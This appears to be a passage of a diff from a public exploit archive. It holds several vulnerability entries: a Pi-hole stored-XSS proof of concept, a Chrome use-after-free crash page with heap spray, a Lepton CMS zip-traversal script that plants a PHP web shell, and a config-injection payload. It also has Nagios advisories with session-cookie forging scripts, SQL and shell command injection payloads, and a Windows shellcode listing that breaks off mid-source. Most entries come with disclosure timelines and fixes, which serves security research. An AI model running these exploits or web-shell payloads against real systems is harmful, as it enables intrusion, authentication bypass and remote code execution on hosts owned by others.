# to the box to begin with. Still best to use good coding practices,
# and avoid such things.
# Vulnerability PoC: Stored XSS
# Insert this:
# <script>alert('This happens...');</script>
# In either /etc/pihole/blacklist.txt || /etc/pihole/whitelist.txt
#
# Then navigate to:
# http://pi-hole-server/admin/list.php?l=white
# or
# http://pi-hole-server/admin/list.php?l=black
#
# And a pop-up will appear.
# Disclosure timeline:
# July 20th 2016: Sent initial email to author.
# July 21st 2016: Response, bug has been forwarded to web dev people
# July 22nd 2016: Asked to be kept up to date on fix
# July 27th 2016: Author replied saying he shall
# July 28th 2016: - Today I had chocolat milk -
# August 3rd 2016: Reply saying there's a fix, waiting on "Mark" to confirm
# August 3rd 2106: Supplies URL to fix from Github https://github.com/pi-hole/AdminLTE/pull/120
# August 4th 2016: Thanked him for fix, informed him of a lame LFI in the web interface as well.
# August 4th 2016: - While drinking my coffee, I realize my comments are longer than the actual PoC. -
# August 10th 2016: Still nothing
# August 12th 2016: Submitting this is taking too much time to integrate their fix
--
Notice: This email does not mean I'm consenting to receiving promotional
emails/spam/etc. Remember Canada has laws.

104
platforms/osx/dos/40243.html Executable file
View file

@ -0,0 +1,104 @@
#---object-beforeload-chrome.html---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
<html>
<head>
<script>
function sprayOne(mem, size, v) {
var a = new Uint8ClampedArray(size - 20);
for (var j = 0; j < a.length; j++) a[j] = v;
var t = document.createTextNode(String.fromCharCode.apply(null, new Uint16Array(a)));
mem.push(t);
}
function dsm(evnt) {
// spray
var mem = [];
for (var j = 20; j < 8192; j++) sprayOne(mem, j, 0x43);
/*
Chromium release build 28.0.1461.0 (191833), built with options:
GYP_GENERATORS=ninja GYP_DEFINES='component=shared_library mac_strip_release=0' gclient runhooks
lldb attached to Chromium in --single-process mode:
* thread #28: tid = 0x3803, 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155, stop reason = EXC_BAD_ACCESS (code=1, address=0x43434617)
frame #0: 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderBox.h:155
152 virtual IntRect borderBoundingBox() const { return pixelSnappedBorderBoxRect(); }
153
154 // The content area of the box (excludes padding - and intrinsic padding for table cells, etc... - and border).
-> 155 LayoutRect contentBoxRect() const { return LayoutRect(borderLeft() + paddingLeft(), borderTop() + paddingTop(), contentWidth(), contentHeight()); }
156 // The content box in absolute coords. Ignores transforms.
157 IntRect absoluteContentBox() const;
158 // The content box converted to absolute coords (taking transforms into account).
(lldb) reg read
General Purpose Registers:
eax = 0x43434343
ebx = 0x12ae436c
ecx = 0x00000018
edx = 0x0edab374
edi = 0x0edd6858
esi = 0x12ae436c
ebp = 0xb9bf8e38
esp = 0xb9bf8d50
ss = 0x00000023
eflags = 0x00010286
eip = 0x07b617e4 libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172
libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172
cs = 0x0000001b
ds = 0x00000023
es = 0x00000023
fs = 0x00000023
gs = 0x0000000f
(lldb) disass
libwebkit.dylib`WebCore::RenderWidget::updateWidgetGeometry() + 20 [inlined] WebCore::RenderBox::contentBoxRect() const + 5 at RenderWidget.cpp:172
libwebcore_rendering.a`WebCore::RenderWidget::updateWidgetGeometry() + 15 at RenderWidget.cpp:172:
-> 0x7b617e4: calll *724(%eax)
0x7b617ea: movl %eax, -180(%ebp)
0x7b617f0: movl (%ebx), %eax
0x7b617f2: movl %ebx, (%esp)
*/
}
</script>
</head>
<body>
<iframe src="object-beforeload-frame-chrome.html"></iframe>
</body>
</html>
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
#---object-beforeload-frame-chrome.html------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
<html>
<head>
<script>
var nb = 0;
function handleBeforeLoad() {
if (++nb == 1) {
p.addEventListener('DOMSubtreeModified', parent.dsm, false);
} else if (nb == 2) {
p.removeChild(f);
}
}
function documentLoaded() {
f = window.frameElement;
p = f.parentNode;
var o = document.createElement("object");
o.addEventListener('beforeload', handleBeforeLoad, false);
document.body.appendChild(o);
}
window.onload = documentLoaded;
</script>
</head>
<body></body>
</html>
#----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------#
## E-DB Note: Source ~ https://bugs.chromium.org/p/chromium/issues/detail?id=226696

98
platforms/php/webapps/40247.txt Executable file
View file

@ -0,0 +1,98 @@
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/LEPTON-ARCHIVE-DIRECTORY-TRAVERSAL.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.lepton-cms.org
Product:
=================================
Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but full customizable Content Management System (CMS).
Vulnerability Type:
============================
Archive Directory Traversal
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Lepton has feature that lets users install new modules, if malicious user uploads an archive and the module is not valid it
will generate an error. However, the malicious archive will still get decompressed and no check is made for ../ characters in
the file name allowing in arbitrary PHP files to be placed outside the intended target directory for installed modules. This can
then be used to execute remote commands on the affected host system.
e.g.
We get error message as below.
under "Add Ons" tab Install Module.
Invalid LEPTON installation file. Please check the *.zip format.[1]
Archive still gets decompressed and the malicious file is moved outside of the intended target directory, by using ../ in file name.
Exploit code(s):
===============
<?php
#Archive Directory Traversal to RCE exploit
#==============================================
if($argc<2){echo "Usage: <filename>";exit();}
$file_name=$argv[1];
$zip = new ZipArchive();
$res = $zip->open("$file_name.zip", ZipArchive::CREATE);
$zip->addFromString("..\..\..\..\..\..\..\..\RCE.php", '<?php exec($_GET["cmd"]); ?>');
$zip->close();
echo "Malicious archive created...\r\n";
echo "========= hyp3rlinx ============";
?>
Disclosure Timeline:
===========================================================
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX

141
platforms/php/webapps/40248.txt Executable file
View file

@ -0,0 +1,141 @@
[+] Credits: John Page (HYP3RLINX)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/LEPTON-PHP-CODE-INJECTION.txt
[+] ISR: ApparitionSec
Vendor:
==================
www.lepton-cms.org
Product:
=================================
Lepton CMS 2.2.0 / 2.2.1 (update)
LEPTON is an easy-to-use but full customizable Content Management System
(CMS).
Vulnerability Type:
===================
PHP Code Injection
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No input validation check is done on the "Database User" input field when
entering Lepton CMS setup information using the Install Wizard.
Therefore, a malicious user can input whatever they want in "config.php",
this can allow for PHP Remote Command Execution on the Host system.
e.g.
In the database username field, single quote to close "DB_USERNAME" value
then open our own PHP tags.
');?><?php exec(`calc.exe`);?>
Now in "config.php" the Database username becomes ===>
define('DB_USERNAME', '');?><?php exec(`calc.exe`);?>');
A security check attempt is made by Lepton to disallow making multiple HTTP
requests for "config.php". On line 3 of "config.php" file we find.
///////////////////////////////////////////////////////////////////////////////////////////////////////
if(defined('LEPTON_PATH')) { die('By security reasons it is not permitted
to load \'config.php\' twice!!
Forbidden call from \''.$_SERVER['SCRIPT_NAME'].'\'!'); }
///////////////////////////////////////////////////////////////////////////////////////////////////////////
However, the security check is placed on line 3 way before "LEPTON_PATH"
has been defined allowing complete bypass of that access control check.
Now we can inject our own PHP code into the config allowing Remote Command
Execution or Local/Remote File Includes etc...
Next, make HTTP GET request to "http://victim-server/upload/install/save.php"
again and code execution will be achieved or request "config.php"
directly as the security check made on line 3 of "config.php" to prevent
multiple HTTP requests to "config.php" does NOT work anyhow.
In situations where an installation script is provided as part of a some
default image often available as a convenience by hosting providers, this
can
be used to gain code execution on the target system and bypass whatever
security access controls/restrictions etc.
References:
http://www.lepton-cms.org/posts/important-lepton-2.2.2-93.php
Exploit code(s):
===============
1) At step 4 of Leptons Install Wizard, enter ');?><?php
exec(`calc.exe`);?> for Database User name, then fill in rest of fields
2) Click go to step 5 and fill in required fields, then click "Install
LEPTON"
3) Make HTTP GET request to:
http://localhost/LEPTON_stable_2.2.0/upload/install/save.php
OR
http://localhost/LEPTON_stable_2.2.0/upload/config.php
BOOM pop calc.exe...
Disclosure Timeline:
===========================================================
Attempted Vendor Notification: June 11, 2016 (No replies)
Vendor Notification on July 12, 2016 ( thanks Henri Salo )
Vendor Acknowledgement: July 13, 2016
Vendor fixes: July 14, 2016
Vendor release version 2.2.2 : August 12, 2016
August 15, 2016 : Public Disclosure
Severity Level:
================
High
[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the
information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author
prohibits any malicious use of security related information
or exploits by the author or elsewhere.
HYP3RLINX

170
platforms/php/webapps/40250.txt Executable file
View file

@ -0,0 +1,170 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios Log Server Multiple Vulnerabilities
Affected versions: Nagios Log Server <= 1.4.1
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf
+-----------+
|Description|
+-----------+
The Nagios Log Server application is affected by multiple security
vulnerabilities, including authentication bypass, stored cross-site
scripting, inconsistent authorization controls and privilege escalation.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution in the context of the root user.
+------------+
|Exploitation|
+------------+
==Authentication Bypass==
Authentication for the Nagios Log Server web management interface can be
bypassed due to an insecure implementation of the function validating
session cookies within the Session.php file. As shown below, the
application uses a base64 encoded serialized PHP string along with a
SHA1 HMAC checksum as the cookie to authenticate and manage user
sessions. A sample cookie format is shown below:
a:11:{s:10:"session_id";s:32:"4a6dad39cec8d6a5ef5a1a1d231bf9fa";s:10:"ip_address";s:15:"123.123.123.123";
s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";
s:13:"last_activity";i:1463700310;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"user";
s:5:"email";s:16:"test@example.com";s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}<SHA1-HMAC-CHECKSUM>
The application relies on the validation against the SHA1 HMAC to
recognize and destroy invalid session cookies when the checksum value
does not match. However the encryption key used to generate the HMAC
checksum is statically set to the SHA1 hash value of the
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
This information can be controlled by the attacker and as such should
not be considered a secure randomly generated value for the secret
encryption key.
Since no further verification is performed for other non-predictable
fields (e.g. session_id, apikey, email, username etc.) and only a valid
user agent string matching the correct HTTP header value is required, an
attacker can forge arbitrary session cookies and bypass authentication.
The script on the following page generates session cookies which are
accepted and validated successfully by the application. A user_id
value of 1 can be used to initiate a session in the context of the admin
user.
[POC - nagiosls_forge_cookie.php]
<?php
// Usage: php nagiosls_forge_cookie.php [TARGET_IP_ADDRESS/DOMAIN NAME]
$host = $argv[1];
<?php
$host = $argv[1];
$session =
'a:11:{s:10:"session_id";s:32:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:10:"ip_address";s:15:"123.123.123.123";
s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";s:13:"last_activity";
i:1463693772;s:9:"user_data";s:0:"";s:7:"user_id";s:1:"1";s:8:"username";s:4:"XXXX";s:5:"email";s:16:"test@example.com";
s:12:"ls_logged_in";i:1;s:10:"apisession";i:1;s:8:"language";s:7:"default";}';
$encryption_key = sha1($host);
$hmac_check = hash_hmac('sha1', $session, $encryption_key);
$cookie = $session . $hmac_check;
echo urlencode($cookie);
?>
This vulnerability is present across multiple Nagios products.
==Stored Cross-Site Scripting==
The Nagios Log Server application does not validate and HTML encode log
data sent by configured sources. This issue is aggravated by the fact
that the application does not maintain a list of authorized log sources,
but instead accept data from any host connecting to the Nagios Log
Server port responsible of collecting logs (TCP 5544). An attacker can
exploit this vulnerability to send malicious JavaScript code and execute
it in the context of Nagios Log Server user session as shown below.
[POC STORED XSS]
# echo '<script>alert("xss")</script>' | nc [TARGET IP] 5544
The payload gets rendered under '/nagioslogserver/dashboard'.
==Inconsistent Authorization Controls==
The Nagios Log Server application provides intended functionality to
define custom alert commands using different configuration options. By
default, only administrative users can define alert commands which
execute scripts on the Log Server filesystem when an alert is triggered.
However, the application does not properly enforce authorization checks
and an attacker can access the same functionality in the context of a
standard user session by providing the correct payload in the alert
POST parameter. This functionality can be abused to obtain remote code
execution on the target system as the application does not restrict the
script definition to a single folder and an attacker can specify
absolute paths to any script or executable file present on the Log
Server host.
[POC - CREATE COMMAND EXECUTION ALERT]
URL => /nagioslogserver/api/check/create/1
Method => POST
Payload =>
alert={"name"%3a"StduserAlertTest","check_interval"%3a"1m","lookback_period"%3a"1m","warning"%3a"1",
"critical"%3a"1","method"%3a{"type"%3a"exec","path"%3a"/bin/touch",
"args"%3a"/tmp/STDUSER"},"alert_crit_only"%3a0,"created_by"%3a"stduser","query_id"%3a"AVTLGmd-GYGKrkWMo5Tc"}
==Privilege Escalation==
The default Log Server application sudoers configuration allows the
apache user to run the get_logstash_ports.sh script as root without
being prompted for a password. However insecure file write permissions
have been granted to the 'nagios' group for the get_logstash_ports.sh
script file. Since the apache user is a member of the 'nagios' group, an
attacker can overwrite the script contents with arbitrary data.
Details about the script with insecure permissions are provided below:
PATH => /usr/local/nagioslogserver/scripts/get_logstash_ports.sh
PERMISSIONS => rwxrwxr-x nagios nagios
+----------+
| Solution |
+----------+
Upgrade to Nagios Log Server 1.4.2
+------------+
| Timeline |
+------------+
2/06/2016 Initial disclosure to vendor
3/06/2016 Vendor acknowledges receipt of advisory
22/07/2016 Vendor releases patched software version
11/08/2016 Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosLogServerAdvisory.pdf

191
platforms/php/webapps/40251.txt Executable file
View file

@ -0,0 +1,191 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios Network Analyzer Multiple Vulnerabilities
Affected versions: Nagios Network Analyzer <= 2.2.0
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf
+-----------+
|Description|
+-----------+
The Nagios Network Analyzer application is affected by multiple security
vulnerabilities, including authentication bypass, SQL injection,
arbitrary code execution via command injection and privilege escalation.
These vulnerabilities can be chained together to obtain unauthenticated
remote code execution in the context of the root user.
+------------+
|Exploitation|
+------------+
==Authentication Bypass==
Authentication for the Nagios Network Analyzer web management interface
can be bypassed due to an insecure implementation of the function
validating session cookies within the Session.php file. As shown
below, the application uses a base64 encoded serialized PHP string along
with a SHA1 HMAC checksum as the cookie to authenticate and manage user
sessions. A sample cookie format is shown below:
a:15:{s:10:"session_id";s:32:"325672f137d4e3747a0f9e61a4c867b2";s:10:"ip_address";s:15:"192.168.xxx.xxx";
s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT 6.3; WOW64; rv:46.0)
Gecko/20100101 Firefox/46.0";s:13:"last_activity";
i:1463165417;s:9:"user_data";s:0:"";s:8:"identity";s:11:"nagiosadmin";s:8:"username";s:11:"nagiosadmin";s:5:"email";
s:30:"xxxxxx@security-assessment.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"1463163525";s:9:"apiaccess";
s:1:"1";s:6:"apikey";s:40:"6ba11d3f6e84011b3332d7427d0655de64f11d5e";s:8:"language";s:7:"default";s:10:"apisession";
b:1;s:7:"view_id";i:0;}<SHA1_HMAC_CHECKSUM>
The application relies on the validation against the SHA1 HMAC to
recognize and destroy invalid session cookies when the checksum value
does not match. However the encryption key used to generate the HMAC
checksum is statically set to the SHA1 hash value of the
$_SERVER['HTTP_HOST'] PHP variable, which is the Host HTTP header value.
This information can be controlled by the attacker and as such should
not be considered a secure randomly generated value for the secret
encryption key.
Since no further verification is performed for other non-predictable
fields (e.g. session_id, apikey, email, username etc.) and only a valid
user agent string matching the correct HTTP header value is required, an
attacker can forge arbitrary session cookies and bypass authentication.
The script on the following page generates session cookies which are
accepted and validated successfully by the application. A user_id
value of 1 can be used to initiate a session in the context of the admin
user.
[POC - nagiosna_forge_cookie.php]
<?php
// Usage: php nagiosna_forge_cookie.php [TARGET_IP_ADDRESS/DOMAIN NAME]
$host = $argv[1];
$session =
'a:14:{s:10:"session_id";s:32:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:10:"ip_address";
s:15:"123.123.123.123";s:10:"user_agent";s:72:"Mozilla/5.0 (Windows NT
6.3; WOW64; rv:46.0) Gecko/20100101
Firefox/46.0";s:13:"last_activity";i:1463229493;s:9:"user_data";s:0:"";s:8:"identity";s:4:"XXXX";s:8:"username";
s:4:"XXXX";s:5:"email";s:16:"test@example.com";s:7:"user_id";s:1:"1";s:14:"old_last_login";s:10:"XXXXXXXXXX";
s:9:"apiaccess";s:1:"1";s:6:"apikey";s:40:"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX";s:8:"language";s:7:"default";
s:10:"apisession";b:1;}';
$encryption_key = sha1($host);
$hmac_check = hash_hmac('sha1', $session, $encryption_key);
$cookie = $session . $hmac_check;
echo urlencode($cookie);
?>
This vulnerability is present across multiple Nagios products.
==SQL Injection==
Multiple SQL injection vulnerabilities exist in the application web
management interface. An attacker can exploit this vulnerabilities to
retrieve sensitive data from the application MySQL database.
URL =>
/nagiosna/index.php/api/checks/read?q%5Blastcode%5D=0&o%5Bcol%5D=<PAYLOAD>&o%5Bsort%5D=ASC
Method => GET
Parameter => o[col]
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)
URL =>
/nagiosna/index.php/api/sources/read?o%5Bcol%5D=<PAYLOAD>&o%5Bsort%5D=ASC
Method => GET
Parameter => o[col]
POC Payload => name AND (SELECT * FROM (SELECT(SLEEP(5)))UtTW)
URL => /nagiosna/index.php/admin/globals
Method => POST
Parameter => timezone
POC Payload => US/Eastern%' AND (SELECT 4646 FROM(SELECT
COUNT(*),CONCAT(0x232323,(SELECT MID((IFNULL(CAST(apikey AS
CHAR),0x20)),1,54) FROM nagiosna_users WHERE id=1 LIMIT
0,1),0x232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x)a) AND '%'=''
==Command Injection==
A command injection vulnerability exists in the function generating PDF
reports for download. Base64 encoded user-supplied input is passed as an
argument to system shell calls without being escaped. An attacker can
inject arbitrary shell commands and obtain remote code execution in the
context of the apache user.
URL => /nagiosna/index.php/download/report/sourcegroup/<ID>/<BASE64
ENCODED PAYLOAD>
Method => GET
POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "
URL => /nagiosna/index.php/download/report/source/<ID>/<BASE64 ENCODED
PAYLOAD>
Method => GET
POC Payload => q[rid]=5&q[gid]=1" "";{touch,/tmp/TESTFILE};echo "
Arbitrary code execution in the context of the nna user can also be
obtained by abusing the intended functionality to define custom alert
commands. As shown in the next section, this exposes the application to
additional privilege escalation attack vectors.
==Privilege Escalation==
The default application sudoers configuration allows the apache and
nna users to run multiple Bash and Python scripts as root without
being prompted for a password. The 'apache' user is in the 'nnacmd'
group, which has insecure write permissions to multiple script files. An
attacker can overwrite their contents with a malicious payload (i.e.
spawn a shell) and escalate privileges to root.
The script files with insecure permissions are listed below:
PATH => /usr/local/nagiosna/bin/rc.py
PERMISSIONS => rwxrwxr-t nna nnacmd
PATH => /usr/local/nagiosna/scripts/change_timezone.sh
PERMISSIONS => rwsrwsr-t nna nnacmd
PATH => /usr/local/nagiosna/scripts/upgrade_to_latest.sh
PERMISSIONS => rwsrwsr-t nna nnacmd
+----------+
| Solution |
+----------+
Upgrade to Nagios Network Analyzer 2.2.2.
+------------+
| Timeline |
+------------+
2/06/2016 Initial disclosure to vendor
3/06/2016 Vendor acknowledges receipt of advisory
3/06/2016 Vendor releases new software build (2.2.1)
8/07/2016 Inform vendor about insecure fix (generation of encryption
key based on epoch)
9/07/2016 Vendor confirms issue and replies with new fix
01/08/2016 Vendor releases patched software version
11/08/2016 Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosNetworkAnalyzerAdvisory.pdf

124
platforms/php/webapps/40252.txt Executable file
View file

@ -0,0 +1,124 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Nagios Incident Manager Multiple Vulnerabilities
Affected versions: Nagios Incident Manager <= 2.0.0
PDF:
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf
+-----------+
|Description|
+-----------+
The Nagios Incident Manager application is vulnerable to multiple
vulnerabilities, including remote code execution via command injection,
SQL injection and stored cross-site scripting.
+------------+
|Exploitation|
+------------+
==Command Injection==
Multiple command injection vulnerabilities exist within the incident
report file generation functionality as user input is passed to system
shell calls without validation. A limited non-administrative user, who
by default does not have permissions to add custom MIME types for
incident file attachments, can exploit these vulnerabilities to obtain
remote code execution on the Incident Manager system as the apache user.
URL => /nagiosim/reports/download/<pdf|jpg>/mttr/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
URL => /nagiosim/reports/download/<pdf|jpg>/closed/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
URL => /nagiosim/reports/download/<pdf|jpg>/first_response/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
URL => /nagiosim/reports/download/<pdf|jpg>/general/<BASE64 PAYLOAD>
Method => GET
POC Payload => start_date=2016-05-06&end_date=2016-05-06&types[]=2"
"";{touch,/tmp/MYFILE};echo
==SQL Injection==
The Nagios IM admin functionality to update the application settings is
vulnerable to an SQL Injection vulnerability via error-based payloads.
An attacker can inject into the timezone POST parameter and retrieve
sensitive information from the application MySQL database.
URL => /nagiosim/admin/settings
Method => POST
Parameter => timezone
Payload => Pacific/Samoa' AND (SELECT 5323 FROM(SELECT
COUNT(*),CONCAT(0x717a7a7171,(MID((IFNULL(CAST(DATABASE() AS
CHAR),0x20)),1,54)),0x7170786a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
==Stored Cross-Site Scripting==
Multiple stored cross-scripting vulnerabilities exist in the Nagios IM
web interface, allowing a standard user to insert malicious JavaScript
payloads into administrative and non-administrative application
functionality. This attack vector could be used by an authenticated
attacker with standard user privileges to hijack the session of an admin
user and extend their permissions within the application (e.g. adding
PHP as a valid MIME type for file attachments).
URL => /nagiosim/incidents/add
Method => POST
Parameters => title, summary, priority, file_description, status
Render => /nagiosim/incidents, /nagiosim/incidents/details/<ID>
POC Payload => <script>alert(1)</script>
URL => /nagiosim/api/incidents/<ID>/messages
Method => POST
Parameters => title
Render => /nagiosim/incidents/details/<ID>
POC Payload => <script>alert(1)</script>
URL => /nagiosim/profile
Method => POST
Parameters => username, first_name, last_name
Render => /nagiosim/admin/users, Global Menu Banner (username)
POC Payload => <script>alert(1)</script>
+----------+
| Solution |
+----------+
Upgrade to Nagios Incident Manager 2.0.1
+------------+
| Timeline |
+------------+
2/06/2016 - Initial disclosure to vendor
3/06/2016 - Vendor acknowledges receipt of advisory
8/07/2016 - Vendor releases patched software version (2.0.1)
11/08/2016 Public disclosure
+------------+
| Additional |
+------------+
Further information is available in the accompanying PDF.
http://www.security-assessment.com/files/documents/advisory/NagiosIncidentManager.pdf

273
platforms/win_x86/shellcode/40245.c Executable file
View file

@ -0,0 +1,273 @@
/*
# Title : Windows x86 MessageBoxA shellcode
# Author : Roziul Hasan Khan Shifat
# Date : 14-08-2016
# Tested On : Windows 7 starter x86
*/
/*
Disassembly of section .text:
00000000 <_start>:
0: 31 c9 xor %ecx,%ecx
2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax
6: 8b 40 0c mov 0xc(%eax),%eax
9: 8b 70 14 mov 0x14(%eax),%esi
c: ad lods %ds:(%esi),%eax
d: 96 xchg %eax,%esi
e: ad lods %ds:(%esi),%eax
f: 8b 48 10 mov 0x10(%eax),%ecx
12: 31 db xor %ebx,%ebx
14: 8b 59 3c mov 0x3c(%ecx),%ebx
17: 01 cb add %ecx,%ebx
19: 8b 5b 78 mov 0x78(%ebx),%ebx
1c: 01 cb add %ecx,%ebx
1e: 8b 73 20 mov 0x20(%ebx),%esi
21: 01 ce add %ecx,%esi
23: 31 d2 xor %edx,%edx
00000025 <g>:
25: 42 inc %edx
26: ad lods %ds:(%esi),%eax
27: 01 c8 add %ecx,%eax
29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax)
2f: 75 f4 jne 25 <g>
31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax)
38: 75 eb jne 25 <g>
3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax)
41: 75 e2 jne 25 <g>
43: 8b 73 1c mov 0x1c(%ebx),%esi
46: 01 ce add %ecx,%esi
48: 8b 14 96 mov (%esi,%edx,4),%edx
4b: 01 ca add %ecx,%edx
4d: 89 d6 mov %edx,%esi
4f: 89 cf mov %ecx,%edi
51: 31 db xor %ebx,%ebx
53: 53 push %ebx
54: 68 61 72 79 41 push $0x41797261
59: 68 4c 69 62 72 push $0x7262694c
5e: 68 4c 6f 61 64 push $0x64616f4c
63: 54 push %esp
64: 51 push %ecx
65: ff d2 call *%edx
67: 83 c4 10 add $0x10,%esp
6a: 31 c9 xor %ecx,%ecx
6c: 68 6c 6c 42 42 push $0x42426c6c
71: 88 4c 24 02 mov %cl,0x2(%esp)
75: 68 33 32 2e 64 push $0x642e3233
7a: 68 75 73 65 72 push $0x72657375
7f: 54 push %esp
80: ff d0 call *%eax
82: 83 c4 0c add $0xc,%esp
85: 31 c9 xor %ecx,%ecx
87: 68 6f 78 41 42 push $0x4241786f
8c: 88 4c 24 03 mov %cl,0x3(%esp)
90: 68 61 67 65 42 push $0x42656761
95: 68 4d 65 73 73 push $0x7373654d
9a: 54 push %esp
9b: 50 push %eax
9c: ff d6 call *%esi
9e: 83 c4 0c add $0xc,%esp
a1: 31 d2 xor %edx,%edx
a3: 31 c9 xor %ecx,%ecx
a5: 52 push %edx
a6: 68 73 67 21 21 push $0x21216773
ab: 68 6c 65 20 6d push $0x6d20656c
b0: 68 53 61 6d 70 push $0x706d6153
b5: 8d 14 24 lea (%esp),%edx
b8: 51 push %ecx
b9: 68 68 65 72 65 push $0x65726568
be: 68 68 69 20 54 push $0x54206968
c3: 8d 0c 24 lea (%esp),%ecx
c6: 31 db xor %ebx,%ebx
c8: 43 inc %ebx
c9: 53 push %ebx
ca: 52 push %edx
cb: 51 push %ecx
cc: 31 db xor %ebx,%ebx
ce: 53 push %ebx
cf: ff d0 call *%eax
d1: 31 c9 xor %ecx,%ecx
d3: 68 65 73 73 41 push $0x41737365
d8: 88 4c 24 03 mov %cl,0x3(%esp)
dc: 68 50 72 6f 63 push $0x636f7250
e1: 68 45 78 69 74 push $0x74697845
e6: 8d 0c 24 lea (%esp),%ecx
e9: 51 push %ecx
ea: 57 push %edi
eb: ff d6 call *%esi
ed: 31 c9 xor %ecx,%ecx
ef: 51 push %ecx
f0: ff d0 call *%eax
*/
/*
section .text
global _start
_start:
xor ecx,ecx
mov eax,[fs:ecx+0x30] ;PEB
mov eax,[eax+0xc] ;PEB->Ldr
mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList
lodsd
xchg esi,eax
lodsd
